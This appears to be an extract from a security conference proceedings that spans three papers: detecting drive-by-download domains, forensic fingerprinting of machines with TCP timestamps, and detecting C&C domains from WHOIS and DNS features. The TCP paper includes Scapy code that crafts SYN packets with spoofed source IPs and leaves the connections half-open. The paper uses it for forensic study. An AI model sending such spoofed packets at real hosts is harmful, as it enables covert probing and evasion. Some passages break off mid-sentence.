that the attacker mainly uses the web domain
for the DbD attack just after creating it.


Figure 5. Survey result of the registration period.

4.3 Amounts of set feature values


Before performing an experiment, scaling is carried out to convert the domain information into the amounts of set feature values. Scaling makes it possible to prevent information from being dropped. Here, an amount of set feature values is a preset value for the range into which the extracted feature quantity falls.
For example, when the registration period is less than 4000 days or more than 6000 days, a large difference occurs in the percentages of DbD domains and benign domains. Therefore, the amount of set feature values for the registration period is determined by the number of days relative to these boundary values. Table 3 shows the amounts of set feature values of the registration period. "nil" in the table indicates that the registration period could not be acquired.

Table 3. Amounts of set feature values of the registration period

Registration period (days)   Amount of set feature values
nil, 1-4000                  1
4001-6000                    2
6001 or more                 3
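For instance, the scaling of the registration period in Table 3 amounts to a simple mapping (a sketch; the function name is ours):

def registration_period_feature(days):
    # Map a raw registration period (in days, or None when it cannot be
    # acquired) to the preset feature value of Table 3.
    if days is None or days <= 4000:   # "nil" or 1-4000 days
        return 1
    if days <= 6000:                   # 4001-6000 days
        return 2
    return 3                           # 6001 days or more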

5. Evaluation
5.1 Evaluation method
The detection rate was calculated based on
the number of domains that were determined
accurately. Table 4 shows the domain detection
results. The result is True Positive (TP) if the
DbD domain is correctly determined as a DbD

domain; otherwise, the result is False Negative


(FN). Additionally, the result is False Positive
(FP) if a benign domain is determined to be a DbD
domain; otherwise, the result is True Negative
(TN).
Table 4. Domain detection results

                 Determined to be a DbD domain   Determined to be a benign domain
DbD domain       TP                              FN
Benign domain    FP                              TN

Each of the detection rates is obtained from formula (6) below. In addition, the balance between the complexity of the statistical model and its goodness of fit to the data was evaluated by Akaike's Information Criterion [17].

Accuracy = (TP + TN) / (TP + TN + FP + FN)    (6)

Akaike's Information Criterion (AIC) is an indicator for evaluating the goodness of the statistical model.
As the number of parameters increases, the detection rate tends to increase. However, because the result is then more affected by noise, the reliability can decrease. Therefore, it is possible to derive the optimal number of parameters by calculating the AIC and comparing it with the experimental results. In many cases, the number of parameters that gives the minimum AIC is the optimal number of parameters.
The AIC is determined by formula (7), where L is the maximum likelihood, derived from the numbers of correctly and incorrectly detected domains, and K indicates the number of parameters used in the experiment.

AIC = -2 log L + 2K    (7)

The F-measure is an indicator used to comprehensively evaluate the completeness and the accuracy of the classification results. The F-measure is calculated by formula (8). Precision, which is an indicator of the accuracy (the compliance rate), is calculated by formula (9). In addition, Recall, which is an indicator of the completeness, is calculated by formula (10).

F-measure = 2 * Precision * Recall / (Precision + Recall)    (8)

Precision = TP / (TP + FP)    (9)

Recall = TP / (TP + FN)    (10)
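A small Python sketch of formulas (6)-(10) and the AIC of formula (7); the function names are ours, and the example call uses the counts that follow from Table 7 for the optimal parameters (TP = 185, FN = 15, FP = 9 + 4 + 1 = 14, TN = 91 + 66 + 29 = 186), which reproduces the 92.75% accuracy and the values in Table 8:

def evaluation_metrics(tp, fn, fp, tn):
    accuracy = (tp + tn) / (tp + tn + fp + fn)                   # formula (6)
    precision = tp / (tp + fp)                                   # formula (9)
    recall = tp / (tp + fn)                                      # formula (10)
    f_measure = 2 * precision * recall / (precision + recall)    # formula (8)
    return accuracy, precision, recall, f_measure

def aic(log_likelihood, k):
    return -2 * log_likelihood + 2 * k                           # formula (7)

print(evaluation_metrics(tp=185, fn=15, fp=14, tn=186))
# approximately (0.9275, 0.9296, 0.9250, 0.9273)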

5.2 Result of experiment


We describe the classification result of the
domains. Table 5 shows the highest detection
rate and the AIC for the numbers of parameters.
Table 5. Domain classification result

Number of parameters   Highest detection rate   AIC
2                      87.50%                   97.47
3                      91.00%                   74.66
4                      92.75%                   63.84
5                      92.75%                   65.84
6                      93.00%                   65.99
7                      93.25%                   66.13
8                      93.25%                   68.13
9                      93.25%                   70.14
10                     93.25%                   72.14
11                     92.25%                   81.53
12                     92.00%                   85.37
13                     92.50%                   83.69

In the result of this experiment, 93.25% was the highest detection rate, obtained with 7, 8, 9, and 10 parameters. However, if the AICs are compared, 63.84 is the minimum AIC, obtained with 4 parameters. Therefore, the optimal number of parameters is 4. Table 6 shows the combination of domain information for the 4 optimal parameters, which yields the detection rate of 92.75%.
MINIMUM represents the validity period of
the negative cache. A negative cache is a


mechanism to cache information that did not


exist when making an inquiry to a non-existent
domain.
EXPIRE represents the period until the
current data is discarded in the case that the
secondary server continuously fails to REFRESH. REFRESH is the interval at
which the secondary server queries the update.
Table 6. Optimal parameters

Domain information
MINIMUM   Registration period   TXT-Strings   EXPIRE

Table 7 shows the detection result for each scale of domain.

Table 7. Detection result of each scale of the domain

Domain                         Sample data   Correctly classified   Misclassified   Detection rate
DbD domain                     200           185                    15              92.50%
Large-scale web site domain    100           91                     9               91.00%
Middle-scale web site domain   70            66                     4               94.29%
Small-scale web site domain    30            29                     1               96.67%

Table 8 shows the F-measure, Precision, and Recall of the optimal parameters.

Table 8. F-measure, Precision and Recall of the optimal parameters

F-measure   Precision   Recall
0.9273      0.9296      0.9250

6. Consideration
In the experiment, the detection rate of the
optimal parameters was 92.75%. Therefore, the
proposed method of this study is inferior in
terms of the detection rate in comparison with
the methods of related work.


However, when attention is paid to processing speed, the proposed method of this study is often superior. The reason is that JavaScript-based methods must examine the JavaScript programs found in many web sites, and computation is required for every JavaScript program in a web site, whereas the proposed method only examines domain information.
The registration period is always included in
the combination of domain information when
calculating the highest detection rates by the
number of parameters. Therefore, it was found
that the registration period affects most
classifications of domain information.
In addition, some of the differences in the
detection rate of each scale of a benign domain
have been confirmed. Thus, it is considered that
the optimal parameters can possibly vary
depending on the scale of the domain.
Therefore, we consider that the optimal
parameters for each scale of a benign domain
can be derived.
7. Conclusion
We proposed a method using a support
vector machine (SVM) and the data in a
Domain Name System (DNS) to identify the
domain used in a DbD attack. The result of
experiments showed that the detection rate was
92.75% by the proposed method. The
parameters to obtain the detection rate were
MINIMUM, Registration period, TXT-Strings
and EXPIRE.
Next, we plan to obtain the optimal
parameters for each scale of the benign domain.
In addition, we would like to improve the
detection rate by combining our method with a
method proposed by other researchers.
REFERENCES

[1] Drive by Download: The Web Under Siege, http://www.viruslistjp.com/analysis/?pubid=204792056

[2] URL.Blacklist.com, http://urlblacklist.com/

[3] History of Support Vector Machines, http://www.svms.org/history.html

[4] Shota Okayasu, Ryoichi Sasaki: "Proposal and Evaluation of Methods using the Quantification Theory and Machine Learning for Detection C&C Server used in Botnet," DICOMO2015, pp. 911-917 (2015)

[5] Justin Ma, Lawrence K. Saul, Stefan Savage, and Geoffrey M. Voelker: "Beyond Blacklists: Learning to Detect Malicious Web Sites from Suspicious URLs," Proceedings of the 15th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (KDD '09), pp. 1245-1254 (2009)

[6] Mehran Jodavi, Mahdi Abadi, and Elham Pah: "DbDHunter: An Ensemble-based Anomaly Detection Approach to Detect Drive-by Download Attacks," 2015 5th International Conference on Computer and Knowledge Engineering (ICCKE), pp. 273-278 (2015)

[7] Jiawei Su, Katsunari Yoshioka, Junji Shikata, Tsutomu Matsumoto: "Detection of obfuscated malicious JavaScript based on information-theoretic measures and novelty detection," CSS2015, Vol. 2015, No. 3, pp. 226-233 (2015)

[8] Gaya K. Jayasinghe, J. Shane Culpepper, and Peter Bertok: "Efficient and effective realtime prediction of drive-by download attacks," Journal of Network and Computer Applications, 38, pp. 135-149 (2014)

[9] scikit-learn: machine learning in Python, http://scikit-learn.org/stable/index.html

[10] Library Resolv: Ruby 2.1.0, http://docs.ruby-lang.org/ja/2.1.0/library/resolv.html

[11] DNS Client Library for .NET, http://simpledns.com/dns-client-lib.aspx

[12] Kohavi, Ron: "A study of cross-validation and bootstrap for accuracy estimation and model selection," Proceedings of the Fourteenth International Joint Conference on Artificial Intelligence, 2, pp. 1137-1143 (1995)

[13] M. Kamizono, M. Akiyama, T. Kasama, J. Murakami, M. Hatada, M. Terada: "Datasets for Anti-Malware Research ~MWS Datasets 2015~," CSEC2015, Vol. 2015-CSEC-70, No. 6 (2015)

[14] MWS: Anti-malware research personnel training workshop, http://www.iwsec.org/mws/2015/

[15] Alexa: The top sites on the web, http://alexa.com/topsites

[16] Fortune: Fortune 500 - Daily & Breaking Business News, http://fortune.com/

[17] H. Akaike, S. Amari, G. Kitagawa, Y. Kabashima, H. Shimodaira, "Akaike's Information Criterion, AIC," 2007.


Fingerprinting Violating Machines with TCP Timestamps


Mohammed I. Al-Saleh
Jordan University of Science and Technology
Department of Computer Science
P.O. Box 3030
Irbid, Jordan 22110
[email protected]

Abstract
Cyber crime has increased as a side effect of the
dramatic growth in Internet deployment. Identifying the machines that are responsible for crimes
is a vital step in an attack investigation. Tracking the IP address of the attacker to its origin is
indispensable. However, apart from finding the attacker's (possible) machine, it is necessary to provide supportive proofs that bind the attack to the attacker's machine, rather than depending solely
on the IP address of the attacker, which can be dynamic. This paper proposes to implant such supportive proofs by utilizing the timestamps in the
TCP header. Our results show that unique timestamps can be recovered in target machines. In addition, because a violator is unaware of (and has
no control over) the internals of the TCP, the investigation process is empowered with stealth. To
the best of our knowledge, we are the first to utilize protocol remnants in fingerprinting violating
machines.

Introduction

Since cyber crimes are delivered through the network, security analysts need to understand the network's internal functionalities so they can reason
about attacks and draw conclusions. Basically, a
computer network is a set of nodes, links, and
protocols that enable the nodes to communicate


through the links. The protocols are the building blocks of computer networks, starting from the
physical layer (according to the OSI networking
model) up to the application layer.
A violating machine can be geolocated by tracking its IP address. An investigator might look
through the captured machine, seeking crime
proofs in high-level data sources. Such sources include (but are not limited to) files, processes, modules, registries, sockets, log files, browsing histories,
and strings. However, an attacker who is aware of
such sources might manage to hide or destroy them.
Furthermore, the captured machine might not really be the machine used in the attack because of
the dynamic nature of the IP addresses. Given
that, additional supportive proofs are needed to
show that the captured machine is really the machine that launched the attack. Practically, this
is not a problem with the machines having static
IP addresses. However, such binding is necessary
when DHCP is used.
This paper tries to bind the attack to the captured machine by inspecting the machine for some
intentionally remotely implanted marks in the internal data structure of the TCP. These marks are
unnoticed by the attacker because she is unaware
of how the TCP internally manages and stores packets, and she has no control over these functions.
This stealthiness is another advantage of this technique.
After receiving packets, network protocols do
some processing before delivering payloads to


higher protocols. That might include preparing/decoding headers, computing error checking
codes, and encrypting/decrypting data. All such
processing only takes place for data in memory:
data never goes to permanent storage unless some
monitoring or logging tools are explicitly activated
and configured to do so. This paper only seeks
in-memory artifacts.
This paper is organized as follows. In Section 2,
we give a brief overview of the TCP protocol and
highlight some of its header fields which we will
utilize in this study. Our investigation model is
presented in Section 3. This is followed by Section 4
that explains our experimental setup. Our results
are shown in Section 5. A discussion and future
work are covered in Section 6. This is followed by
related work and the conclusion.

Figure 1: The TCP header. Reproduced from http://archive.is/www.troyjessup.com

Transmission Control Protocol (TCP)

This section illustrates some important aspects of


the TCP protocol. This background is not meant
to show how the TCP generally works nor to be
complete, but rather we intend to highlight some
of the TCP issues.
The TCP protocol provides process-to-process
communication channels. The most attractive feature the TCP ensures is reliability. Furthermore, the TCP preserves connection states and byte order. Many well-known high-level protocols (such
as HTTP, HTTPS, SMTP, and FTP) use the TCP
protocol. Figure 1 shows the TCP header. The
TCP maintains reliable transmission through the
acknowledgements and timeout mechanism. The
TCP establishes a connection with a server using
the well-known three-way handshake process (see
Figure 2). Among the TCP Options of TCP header
is the Timestamp, which is 32-bit long. This option
can be used for performance and synchronization
issues. In this paper, we will utilize Timestamp to
fingerprint a violating machine.


Figure 2: The timeline for the TCP three-way handshake.

Investigation Model

Figure 3 summarizes our investigation model. The investigator creates specially crafted packets and sends them to a suspect machine. Even though the suspect can change the IP address frequently, the investigator's TCP packets will be correctly routed to the suspect's machine. The investigator's next job is to seize the suspect machine and search for the special marks (the TCP timestamps) in its memory. Finding many unique TCP timestamp values in memory assures the investigator about the machine.

Figure 3: Investigation model.

Experimental Setup

We design our experiment around the following question: Can the TCP timestamps be used in fingerprinting a violating machine? Figure 4 shows the basic networking setup for our experiments. A virtual machine is running Linux Ubuntu 12.04 or Windows 7 with 2 GB of RAM. The VM is connected to the host machine through bridged networking. The host machine runs Ubuntu 12.04 and is connected to a router, which is, in turn, connected to the Internet.

Figure 4: Networking setup.

4.1 Experiment invariants

Here is a baseline that applies to the experiment described below:

- The experiment is conducted on both Linux Ubuntu 12.04 and Windows 7 Professional machines.

- The experiment is repeated three times to ensure consistent results.

- The recipient's machine is restarted after conducting an experiment.

- A hundred packets are sent in the experiment. The packets are created manually and the timestamp is set completely randomly. The random numbers are generated with high values to avoid generating small values, such as 0s, which can be found in memory in normal cases with high probability. We also make sure that a random number, when chosen, is not repeated. We used Scapy (http://www.secdev.org/projects/scapy/), a well-known packet sniffing and manipulation Python library, to shape the packets.

- The memory of the recipient's machine is dumped just before, and 10 seconds, 10 minutes, 1 hour, 6 hours, and 12 hours after, sending the packets.

- We consider integer endianness in searching for artifacts. Big-endian integer format refers to a byte order within a memory word where the most significant byte of the integer is stored at the smallest address of the word and the least significant byte is stored at the largest address. In contrast, in the little-endian format, the most significant byte is stored at the largest word address and the least significant byte at the smallest word address. Integers on Intel machines are represented in little-endian, while integers in the network representation are in big-endian.


Figure 5: TCP half-open (Linux).

4.2 The experiment: TCP half-open

Each TCP connection starts with sending a SYN packet to an open port. The receiver responds with
a SYN-ACK packet and stays in, what is called, a
half-open state, waiting for the last ACK packet
to complete the three-way handshake connection
establishment. In this experiment, we create 100
SYN packets and send them to a listening web
server in a virtual machine. The web servers are
Apache and IIS on the Linux and Windows machines, respectively. However, we do not send the
last ACK to check how that affects the memory
lifetime of the packets' fields of interest.
An important issue in this experiment is that the
TCP connection is not completed and thus the recipient is unaware of what the investigator is doing.
Furthermore, because the packets look as if they
are coming from different places (the Source IP is
random in each packet), the recipient has no idea
of who is doing what.
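To make the setup concrete, here is a minimal sketch (our illustrative Python/Scapy code, not the authors' script; the target address is hypothetical) of crafting the 100 SYN packets whose Timestamp option carries unique, high-valued random marks and whose source IP is random, with no final ACK ever sent:

import random
from scapy.all import IP, TCP, send

TARGET = "192.168.1.10"   # hypothetical address of the listening web server
N_PACKETS = 100

used = set()
def unique_timestamp():
    # High random values, never repeated, so that common small integers
    # (such as 0) found in memory are not mistaken for our marks.
    while True:
        ts = random.randint(2**28, 2**32 - 1)
        if ts not in used:
            used.add(ts)
            return ts

for _ in range(N_PACKETS):
    random_src = ".".join(str(random.randint(1, 254)) for _ in range(4))
    pkt = IP(src=random_src, dst=TARGET) / TCP(
        sport=random.randint(1024, 65535), dport=80, flags="S",
        options=[("Timestamp", (unique_timestamp(), 0))])
    send(pkt, verbose=False)   # SYN only; the handshake is left half-open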

Results

In this section, we present our results for the experiments discussed in Section 4. Because the experiment was conducted on both Linux and Windows
machines, we will show two figures; one for Linux
and another for Windows. In addition, because the
experiment is conducted three times, the numbers
are averaged over three runs.
Figure 6: TCP half-open (Windows).

We want to check for the TCP timestamps in the recipient's memory. Because we send 100 packets
in each experiment and we dump the recipient's
memory at different times, we search for the timestamps in the memory dumps. We search for the 100
timestamps (both big and little endian formats) in
all the memory dumps and we record how many
of them are found on each dump. We average the
results over three runs in this way: we accumulate
all the results of all the 100 packets for a specific
dump and divide over 3. For example, if 92 timestamps (out of 100) are found in the 10 Sec dump
in the first run, 93 in the second, and 94 in the
third, then we plot 93 as the average in the 10
Sec dump. Finally, the B in, for example, Timestamp(B) refers to the Big-endian format, and L
refers to the Little-endian format. The x-axis in
all figures represents the memory dumps named
with the time at which the memory is dumped after
completely sending the packets to the recipient.
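A sketch of this search step (our own illustrative Python, assuming a raw memory dump file; the file name and list of timestamps are placeholders), checking each implanted 32-bit value in both byte orders:

import struct

def count_found(dump_path, timestamps):
    # Count how many of the implanted timestamps appear in the dump, in
    # either the big-endian (Timestamp(B)) or little-endian (Timestamp(L))
    # encoding.
    with open(dump_path, "rb") as f:
        data = f.read()
    found = 0
    for ts in timestamps:
        big = struct.pack(">I", ts)      # network / big-endian byte order
        little = struct.pack("<I", ts)   # Intel / little-endian byte order
        if big in data or little in data:
            found += 1
    return found

# print(count_found("dump_10sec.raw", sent_timestamps))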
Figures 5 and 6 show the results for our experiment for both Linux and Windows machines,
respectively. In this experiment, we send 100 SYN
packets to listening services (Apache and IIS). Both
figures show that all the artifacts2 are almost zeros
(i.e., not found) before sending the packets. This
is very intuitive because the packets have not been
sent yet. Furthermore, both figures show that most
artifacts can be found right after sending the packets. In both figures, the artifacts are decreasing
over time. However, we can find the Timestamp(L)
2 The artifacts here means all the values of the protocol fields that we are searching for in memory.


artifacts in both Linux and Windows.


The experiments in this section show that
we can always shape packets to make up scenarios/cases that suit the operating system (OS) so that we can find as many protocol memory artifacts as possible and thus
be able to fingerprint a specific machine.

Discussion and future work

In this paper, we examined the usage of the TCP


timestamps in fingerprinting machines. Experimenting with the other TCP header fields such as
source and destination ports, sequence numbers,
and acknowledgment numbers is a future direction.
In addition, utilizing other protocols, such as IP,
ICMP, IPv6, HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), and RTP (Realtime Transport Protocol), is another future possibility.
Even though the memory is volatile, it contains
very valuable information. Investigators are interested in any useful source of information that has
a potential in resolving cases. Another impact on
the memory is whether the tested machine is heavily loaded or not. Expanding our experiments to make the tested machine busy improves the trustworthiness
of our results. In addition, finding protocol artifacts in permanent storage devices such as hard
drives can be conducted.



Related work

The in-memory data have been considered in several works from security and forensics perspectives
[1, 8, 12, 10, 14, 11, 3, 7, 5, 4, 2, 9, 13].
Even after process termination, 90% of information about processes can still be recovered from the
non-paged memory of a Windows machine for more
than a day [10]. Data lifetime of the userspace portion of the process address space has been studied
by [12]. In addition, the lifetime of the freed memory portions is examined by [6]. Over time, only
15% of memory contents are changed in an idle

ISBN: 978-1-941968-37-6 2016 SDIWC

References

[1] M. I. Al-Saleh and Z. A. Al-Sharif. Utilizing data lifetime of TCP buffers in digital forensics: Empirical study. Digital Investigation, 9(2):119-124, 2012.

[2] P. Broadwell, M. Harren, and N. Sastry. Scrash: a system for generating secure crash information. In Proceedings of the 12th conference on USENIX Security Symposium - Volume 12, SSYM'03, pages 19-19, Berkeley, CA, USA, 2003. USENIX Association.

[3] J. Chow, B. Pfaff, T. Garfinkel, K. Christopher, and M. Rosenblum. Understanding data lifetime via whole system simulation. In Proc. 13th USENIX Security Symposium, August 2004.

[4] J. Chow, B. Pfaff, T. Garfinkel, and M. Rosenblum. Shredding your garbage: reducing data lifetime through secure deallocation. In Proceedings of the 14th conference on USENIX Security Symposium - Volume 14, SSYM'05, pages 22-22, Berkeley, CA, USA, 2005. USENIX Association.

[5] D. Engler, D. Y. Chen, S. Hallem, A. Chou, and B. Chelf. Bugs as deviant behavior: a general approach to inferring errors in systems code. In Proceedings of the eighteenth ACM symposium on Operating systems principles, SOSP '01, pages 57-72, New York, NY, USA, 2001. ACM.

[6] D. Farmer and W. Venema. Forensic Discovery. Addison Wesley Professional, 2004.

[7] T. Garfinkel, B. Pfaff, J. Chow, and M. Rosenblum. Data lifetime is a systems problem. In Proceedings of the 11th workshop on ACM SIGOPS European workshop, EW 11, New York, NY, USA, 2004. ACM.

[8] H. Inoue, F. Adelstein, and R. A. Joyce. Visualization in testing a volatile memory forensic tool. Digital Investigation, 8(Supplement):S42-S51, 2011.

[9] J. Sammons. The Basics of Digital Forensics: The Primer for Getting Started in Digital Forensics. Elsevier, 2012.

[10] A. Schuster. The impact of microsoft windows pool allocation strategies on memory forensics. Digital Investigation, 5, Supplement(0):S58-S64, 2008. The Proceedings of the Eighth Annual DFRWS Conference.

[11] M. Simon and J. Slay. Recovery of skype application activity data from physical memory. In ARES, pages 283-288, 2010.

[12] J. Solomon, E. Huebner, D. Bem, and M. Szezynska. User data persistence in physical memory. Digital Investigation, 4(2):68-72, 2007.

[13] R. M. Stevens and E. Casey. Extracting windows command line details from physical memory. Digital Investigation, 7, Supplement(0):S57-S63, 2010. The Proceedings of the Tenth Annual DFRWS Conference.

[14] A. Walters and N. L. Petroni. Volatools: Integrating volatile memory forensics into the digital investigation process. Digital Investigation, pages 1-18, 2007.

Method for Detecting a Malicious Domain by using WHOIS and DNS features
MASAHIRO KUYAMA, YOSHIO KAKIZAKI and RYOICHI SASAKI
Tokyo Denki University
Tokyo, Japan
[email protected]

ABSTRACT
Damages caused by targeted attacks are a serious
problem. It is not enough to prevent only the initial
infections, because techniques for targeted attacks
have become more sophisticated every year,
especially those seeking to illegally acquire
confidential information. In a targeted attack,
various communications are performed between the
command and control server (C&C server) and the
local area network (LAN), including the terminal
infected with malware. Therefore, it is possible to
find the infected terminal in the LAN by monitoring
the communications with the C&C server. In this
study, we propose a method for identifying the
C&C server by using supervised machine learning
and the feature points obtained from WHOIS and
the DNS of domains of C&C servers and normal
domains. Moreover, we conduct an experiment that
applies real data, and we verify the usefulness of
our method by a cross-validation method. As a
result of the experiment, we could obtain a high
detection rate of about 98.5%.

KEYWORDS
Malware, C&C server, Neural network, SVM

1 Introduction
Damages caused by targeted attacks are a
serious problem [1]. Many targeted attacks aim
at illegal acquisition of confidential information,
such as intellectual property and private
information. A target of this type of attack is a
specific company or organization. To achieve
their objectives, attackers infect terminals with
malware attached to e-mail and use the driveby-download attack.


In Japan, many organizations, including a


leading heavy industry manufacturer, the House
of Representatives, and the Japan Pension
Service, have been subject to attacks and
suffered significant damage. Multi-layered
countermeasures at the entry point and the exit
point are required because it is very difficult to
prevent attacks.
Figure 1 shows the sequence of a targeted
attack.
Step 1: A terminal such as a PC in a local area
network (LAN) is infected with
malware for the targeted attack.
Step 2: The terminal infected with malware
communicates with the C&C server.
Then, more malware is downloaded to
the terminal.
Step 3: The malware attempts to expand the
invasion range to other PCs and
servers in the LAN.
Step 4: Important information, confidential
information and private information of
the organization is transmitted to the
C&C server owned by the attacker
located outside of the LAN.
If we can detect the infection of a terminal in
the LAN and the communication with the C&C
server, we are able to prevent the expansion of damage. However, to detect the infection, we
have to identify the C&C server in advance.
New C&C servers are continuously made by
attackers, and they are not typically listed on
the blacklists containing the IP addresses of
many C&C servers. For this reason, we need to
develop a method to find new C&C servers.



Fig. 1 Sequence of targeted attacks


In our past study, we proposed a detection
technique that had a 96.5% detection rate in
2009 [2].
In this study, we extract the feature points of
WHOIS and the information of the Domain
Name System (DNS) from a C&C server
domain, and we try to detect the C&C server by
using a neural network. We choose feature
points according to their difficulty of spoofing:
valid terms, expiration dates, and e-mail
addresses from the WHOIS information, the
number of mail exchanger (MX) records, and
number of name server (NS) records from the
DNS information.
2 Related Work
Studies for specifying the C&C server are
classified into the following two types.
(1) Studies that focus on communication
packets between the bot PC and the C&C server
Jang et al. [3] and Lu et al. [4] proposed
methods to detect the C&C server by analyzing
the payload of communication packets between
the bot PC and the C&C server. These methods
achieve a high detection rate because they verify
the data body and exclude header information,
such as the destination and source addresses,
which may change with the specification, for
example the port number or a proprietary
transport-layer protocol.
However, we have to observe real-time
communication. Moreover, inadequacies in the
response to unverified issues such as zero-day
attacks should be solved.

(2) Studies that focus on domain information of the C&C server
A bot PC may request name resolution from the
DNS server related to the offending C&C server.
Tsai et al. [5] reported a method based on a data
mining technique called RIPPER, which combines
the domain information of the C&C server with
information obtained from external repositories.
Although this method has an adequate accuracy
rate for detected C&C servers, its failure rate of
detection is high.
Our method [2] uses the valid term and a reverse
lookup of the C&C domain information from the
DNS server and WHOIS. Therefore, the data
acquisition required for analysis is easy, and the
possibility of being infected with malware during
collection is low.
This study reviews the identification of the
C&C server in targeted attacks.
We have been continuing our investigation of
the detection rate, which has decreased with
time. As shown in Table 1, the detection rate
for the data of 2009 was 96.5%. However, the
detection rate fell to 85.0% in 2010 and 76.2%
in 2011. These results reveal that the 2009
parameters were not suitable for 2010 and 2011.
Thus, we updated the discriminative model by
using recent data to adjust the optimal detection
method in each time period.
Table 1 Detection rates of our method over time (detection rate, %)

Year     2009    2010    2011    2013    2014
2009     96.5    85.0    76.5
2011                     95.2    42.5
2013                             80.3    80.8
2014                                     96.7
In our 2014 update, we revised our method to
use quantification theory and machine learning.


The result was still not high enough, although
the detection rate improved to 96.7% in 2014.
3 Methods
Our proposed method focuses on the domain of
the C&C server.
The method uses the WHOIS and the DNS
information from the C&C server's domain.
Our method can identify C&C servers by
extracting the feature points for machine
learning.
To classify a domain as malignant (C&C) or
benign (normal), we use machine learning to
construct the training model as advance
preparation.
3.1 Detection method
First, we prepare benign domains and
malignant domains. Then, feature points are
extracted from the WHOIS and DNS records of
each domain. The extracted features are used in
machine learning to construct a training model
(Figure 2). The training model then determines
whether an accessed domain is malignant or benign.

3.2 Preparing domains


We prepare two types of domains: normal
domains and C&C domains.
We choose the normal domains from "The top
500 sites on the web" of Alexa [6], because the
top sites have highly secure domains, which
makes them suitable normal domains.
The C&C server domains are extracted by analyzing
Emdivi, PlugX, and PoisonIvy, which are major
malware families used in targeted attacks [7, 8].
We obtained 163 malware samples by using
VirusTotal [9] (Table 2).
Table 2 Collected malware samples from VirusTotal

Malware type   # samples
Emdivi         50
PlugX          63
PoisonIvy      50
The collected malware samples are analyzed in
depth by using the sandbox analyzer LastLine [10].
From the analysis results, LastLine extracted 54
destination domains.
3.3 Features of WHOIS
We can obtain the following information from
WHOIS.
a) Registered domain name
b) Registrar name
c) DNS server name of the domain that has
been registered
d) Valid term of the domain
e) Expiration date of the domain
f) Domain name registrant contact
g) Person in charge for technical contact
h) Contact for registration personnel
i) Contact point for the registrant

Fig. 2. Method Flow


It is difficult to tamper with the information
from a) to e). The valid period d) for normal
servers is long term, but that for C&C servers is
short term, because C&C domains are canceled
if their purpose is achieved [11, 12, 13]. From


this viewpoint, we calculate the valid term by
subtracting the date of d) from the date of e).
Figure 3 shows the valid period for C&C
domains and normal domains.
Fig. 3 Valid terms of domains
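As an illustration only, the valid term can be obtained by subtracting the registration date from the expiration date returned by a WHOIS lookup. The following minimal Python sketch assumes the third-party python-whois package; the package, its field names, and the example domain are illustrative assumptions, not the authors' implementation.

# Minimal sketch (assumption: python-whois package, installed with `pip install python-whois`):
# valid term of a domain = expiration date minus creation date, in days.
import whois  # python-whois

def valid_term_days(domain):
    record = whois.whois(domain)
    created, expires = record.creation_date, record.expiration_date
    # Some registries return lists of dates; keep the earliest creation and latest expiration.
    if isinstance(created, list):
        created = min(created)
    if isinstance(expires, list):
        expires = max(expires)
    if created is None or expires is None:
        return None  # incomplete WHOIS data
    return (expires - created).days

print(valid_term_days("example.com"))  # C&C domains tend to yield small values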


As can be seen in Figure 3, the valid term of the
C&C domains is shorter than that of the normal
domains.
Next, we obtain the following information for
each contact person from f) to i):
a) ID
b) Name
c) Organization name
d) Address
e) Postal code
f) Phone number
g) Country
h) FAX number
i) E-mail address

All of the above information can be easily
falsified. In particular, the registration information
of most of the C&C domains is false, because the
attackers often use WHOIS registration agency
services to hide their identities. However, the
probability that the e-mail address is true is high
even if the other information is false, because the
e-mail address is required for contact.
Thus, we pay attention to the e-mail addresses in
the WHOIS information. First, we extract e-mail
addresses from the WHOIS information for the
normal domains and then for the C&C domains,
and we conduct data mining. We extract the
features for each domain by using a text mining
tool called "UserLocal" [14].
We show the co-occurrence network, which is the
appearance pattern of words used in the e-mail
addresses, for the normal domains (Figure 4) and
the C&C domains (Figure 5). The co-occurrence
network shows the relations by structuring the
word patterns used in the text; words with similar
appearance patterns are connected by a line. We
reveal the structures of the e-mail addresses for
the domains and try to extract the features by
using the word patterns.


Fig. 4 Co-occurrence network (normal domains)


Fig. 5 Co-occurrence network (C&C domains)
The co-occurrence network of the normal
domains shows a large structure connected with
a plurality of words, and two pattern structures
connected with four types of words. On the
other hand, the co-occurrence network of the
C&C domains shows three pattern structures
connected with three types of words. When
examined closely, "NO", "PROTECT", and
"PROXY", which are usually used by WHOIS
registration agency services, are included in
Figure 5.
In this result, we need to point out that the
WHOIS registration agency services used for
the normal domains and the C&C domains are
different.
The proportion of free e-mail addresses for the
C&C domains, 17.5%, is higher than that for
the normal domains, 13.6%.
As a result, we decide to choose three features
of the WHOIS information: domain name, email address, and the valid term.
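As a rough illustration of how the e-mail-address feature could be encoded for machine learning, the sketch below turns a registrant address into simple numeric flags suggested by the co-occurrence analysis (privacy/proxy-service keywords and free-mail providers). The keyword list, the provider list, and the example address are illustrative assumptions, not the authors' encoding.

PRIVACY_KEYWORDS = ("protect", "proxy", "privacy", "whoisguard")   # assumed keyword list
FREE_MAIL_DOMAINS = ("gmail.com", "yahoo.com", "hotmail.com")      # assumed provider list

def email_features(address):
    # Convert one WHOIS registrant e-mail address into simple numeric features.
    address = address.lower()
    local, _, mail_domain = address.partition("@")
    return {
        "uses_privacy_service": int(any(k in address for k in PRIVACY_KEYWORDS)),
        "uses_free_mail": int(mail_domain in FREE_MAIL_DOMAINS),
        "local_part_length": len(local),
    }

print(email_features("whois-protect@example.com"))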

3.4 Features of DNS
We can obtain the following records from the DNS:
a) A record
b) SOA record
c) HINFO record
d) MX record
e) NS record
f) CNAME record
g) WKS record
h) TXT record
The numbers of registered records for the NS
record (Figure 6) and the MX record (Figure 7)
show a remarkable difference.

Fig. 6 NS records

Fig. 7 MX records

Hardly any records are registered in the C&C
domains, although many records are registered
in the normal domains.


Thus, we choose these two features of DNS
information: the number of NS records and the
number of MX records.
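For illustration, the two DNS features can be obtained with a standard resolver library; the sketch below assumes the third-party dnspython package and is not the authors' implementation.

import dns.resolver  # assumption: dnspython package

def record_count(domain, rtype):
    # Number of records of the given type registered for the domain (0 if none).
    try:
        return len(dns.resolver.resolve(domain, rtype))
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.NoNameservers):
        return 0

dns_features = {rtype: record_count("example.com", rtype) for rtype in ("NS", "MX")}
print(dns_features)  # C&C domains tend to have hardly any NS or MX records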
3.5 Training model and algorithm
We construct training models using a support
vector machine (SVM) and a neural network as
the machine learning algorithms.
The neural network is a type of supervised
learning method; it expresses the relation between
the input and the output by mathematically
modeling some of the features found in human
brain functions [15].
The SVM is a machine learning method that
performs two-class classification by pattern
recognition [16].
